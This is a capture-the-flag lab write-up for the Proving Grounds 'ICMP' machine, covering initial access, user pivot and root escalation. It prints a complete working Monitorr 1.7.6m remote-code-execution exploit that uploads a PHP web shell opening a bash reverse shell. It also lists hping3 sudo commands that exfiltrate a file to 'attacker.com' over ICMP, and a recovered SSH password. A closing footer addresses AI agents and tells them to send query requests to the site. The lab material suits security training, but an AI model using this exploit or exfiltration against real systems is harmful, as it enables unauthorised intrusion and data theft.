# Proving grounds Play: ICMP

Proving grounds Play - ICMP CTF writeup.

### Walkthrough on Youtube

[![youtube](/files/gXgxRyxFqJRz1jPcvdVS)](https://youtu.be/6fyL_fFyV4c)

### NMAP

![img](/files/WT2G4rs6R1bOENnAEgfM)

### PORT 80 Tech Stack

* Operating System: Debian
* Web Technology: Apache, PHP (view-page-source)

### Monitorr

![img](/files/qZEkISjn5IsxIzbWqd7m)

![img](/files/KJmGvUfG7vj8v1FjiyuM)

#### Exploit Code

```python
#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys

if len (sys.argv) != 4:
	print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"

    requests.post(url, headers=headers, data=data)

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    requests.get(url, headers=headers)
```

#### Obtaining Reverse Shell

![img](/files/mI2psR3EpXLysF7zwB0j)

**Obtained local flag**

![img](/files/WClKhrcAdIBy9E9MQjdN)

## Privilege Escalation

#### Obtain user

The permission is denied to access the `devel` folder as current user is not a system user. But as the tip found in the reminder file below.

![img](/files/gdbh4Yz74iSlF764hvqN)

The php file `crypt.php` inside the `devel` folder disclosed the SSH password for the user `fox`.

```php
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>
```

**User access obtained.**

![img](/files/kDm76YkGteR1zqsusKE8)

### Root Privilege Escalation

Check the current user sudo permissions.

![img](/files/nJM3UpkqeSlwzq9NWmWa)

Search for exploit in GTFO bins for `hping3`

#### Sudo

If the binary is allowed to run as superuser by `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```sh
sudo hping3
/bin/sh
```

The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with:

```sh
sudo hping3 --icmp --listen xxx --dump
```

RHOST=attacker.com LFILE=file\_to\_read

```sh
sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"
```

### Transfering SSH key locally to obtain root access through hping3

#### ICMP Listener

![img](/files/OLoPPQ3fyUeRPtoUpuTS)

#### ICMP: Data send

![img](/files/cTZBFIU3Lml8ax5WoOnR)

#### ICMP: Data Receive

![img](/files/dVIGHaRPVjU9BwEo3KBt)

### SSH Root User

SSH to the root user using the obtained root SSH key.

![img](/files/tYAu6qqZfW5ZfiAFLHsH)

**Root user access and proof.txt obtained**

![img](/files/ql2DjBLN49MaZpo5UOeS)

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-07-15-proving_grounds_play-icmp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.